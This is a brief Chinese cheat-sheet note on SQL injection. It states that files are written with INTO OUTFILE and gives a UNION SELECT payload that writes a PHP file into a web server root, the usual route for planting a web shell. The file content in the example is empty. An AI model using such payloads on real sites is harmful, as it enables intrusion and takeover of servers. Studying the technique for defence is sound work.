sql注入寫文件的函數有:
文件寫入使用into outfile函數,例如:
union select 1,"",3,4,5 into outfile 'C:/Inetpub/wwwroot/cc.php'